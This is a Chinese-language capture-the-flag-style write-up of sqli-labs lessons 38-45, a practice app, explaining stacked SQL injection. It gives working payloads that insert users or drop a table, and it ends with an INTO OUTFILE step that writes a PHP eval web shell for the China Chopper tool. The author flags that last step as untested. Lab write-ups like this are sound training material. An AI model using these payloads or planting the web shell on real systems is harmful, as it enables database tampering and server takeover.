sqli-labs lesson 38-45

从page3也就是less 38开始进入了堆叠注入（stacked injection）

stacked injection：

简单来说就是进行SQL注入时注入了多条语句。因为之前我们都是只进行过注入一条语句完成attack，

而现在开始一般用；来进行多条语句的注入。在SQL中，分号（;）是用来表示一条sql语句的结束。

我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。

而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union

或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。

举个例子： select * from users where id = 1 ; drop table users;

第一条语句查询信息，第二条删除users表

(注意oracle数据库无法进行堆叠注入，当在其中输入两条或更多语句时直接报错无效字符。)

less 38

观察源码可以看到数据库执行的select语句为：

SELECT * FROM users WHERE id='$id' LIMIT 0,1

构造payload：

?id=1' ; insert into users(id,username,password) values ('100',‘less38’,‘zzw’) --+

 查看数据库：

less 39

观察源码： 是数字型注入

 构造payload：

?id=1;insert into users(id,username,password) values('39','less39','39')#

 查看数据库：（截图一直转圈...就不上传了）

less 40

本关的sql语句为SELECT * FROM users WHERE id=('$id') LIMIT 0,1

闭合的时候注意用 ') 闭合前面的 ('  ，之后后面的 ‘）用 --+注释掉即可 和前两关步骤一样

 payload：

?id=1'); insert into users(id,username,password) values ('40','less40','40') --+

less 41

本关和less 39闭合语句思路是一样的，都是数字型注入，只是没有错误回显了

payload:

?id=1; insert into users(id,username,password) values ('41','less41','41')

less 42

本关变为了post型注入，且观察源代码发现在username处用到了mysqli_real_escape_string函数

进行了过滤，但是password没有进行过滤，切换注入点为password即可。

username随便输入，在password出输入构造的payload

payload：

1'; insert into users(id,username,password) values ('42','less42','42');#

 尝试用插入的用户名和密码进行登录

less 43

与less 42基本一致，也是在password处构造并输入payload

只是此处闭合语句用 ') 闭合前面的 (' 后面就用注释符注释掉即可

用insert into 插入我们想要的username 和 password

payload：

1'); insert into users(id,username,password) values ('43','less43','43');#

less 44

本关与less 43基本一致，区别在于没有回显信息，password处的包裹为 '

password处构造payload：

1'; insert into users(id,username,password) values ('44','less44','44');#

 

 

less 45

与less 42基本一致 区别在于没有错误信息回显，password处被('')包裹

还是在password处构造payload：

1');insert into users(id,username,password) values ('45','less45','45') #

 

 

此处介绍另外一种方法，利用一句话木马和中国菜刀

1.需要有写权限

2.需要一句话木马

3.select xxx into outfile xxx

4.绝对路径

以less45为例，构造payload：

1');select '<?php @eval($_post["users"]);?>' into outfile 'C:\phpstudy1\PHPTutorial\

WWW\sqli-labs-master\Less-45\1.php' #

 （测试有误  不定期更新）